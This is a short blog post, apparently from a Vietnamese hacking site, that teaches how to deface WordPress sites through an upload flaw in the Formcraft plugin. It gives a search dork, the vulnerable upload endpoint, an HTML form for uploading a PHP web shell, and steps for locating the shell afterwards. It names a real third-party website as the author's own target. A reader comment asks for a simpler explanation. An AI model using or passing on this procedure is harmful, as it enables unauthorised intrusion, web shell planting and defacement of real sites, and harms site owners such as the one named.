[DEFACE] How To Deface with Formcraft

– Dork : “powered by Formcraft”
– Vuln : {“failed”:”No file found 2″}
– Exploit : wp-content/plugins/formcraft/file-upload/server/php/upload.php
– Your Accses Shell / File : wp-content/plugins/formcraft/file-upload/server/php/files/[randomcode]nameshell.php
– CSRF Script :
<form method=”POST” action=”target.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php”
enctype=”multipart/form-data”>
<input type=”file” name=”files[]” /><button>Upload</button>
</form>
Save your script use format .html

– My Target Is : http://sellfastoregon.com/
Add exploit in that link then become : http://sellfastoregon.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php
Yeahh that vuln
– Copy that link into your script
– then save use .html
– Open your script
– That is uploader
– Upload your shell
– My name of shell is : bcc.php
– Click Upload
– This is a codeshell–nameshell.php [154df070a157db—bcc.php] – Then show up your codeshell.php
– Copy codeshell.php into url bar
– Paste your codeshell.php in the : wp-content/plugins/formcraft/file-upload/server/php/files/[codeshell]nameshell.php

Xem thêm:  Dork Upload File FCKeditor [Update]

Để lại bình luận

1 Bình luận on "[DEFACE] How To Deface with Formcraft"

avatar
Sort by:   newest | oldest
Lâm Trung Tính | <span class="wpdiscuz-comment-count">951 comments</span>

Ad giải thích thêm cho bài này đi, một số bạn không chuyên nên không hiểu cái này là cài gì

wpDiscuz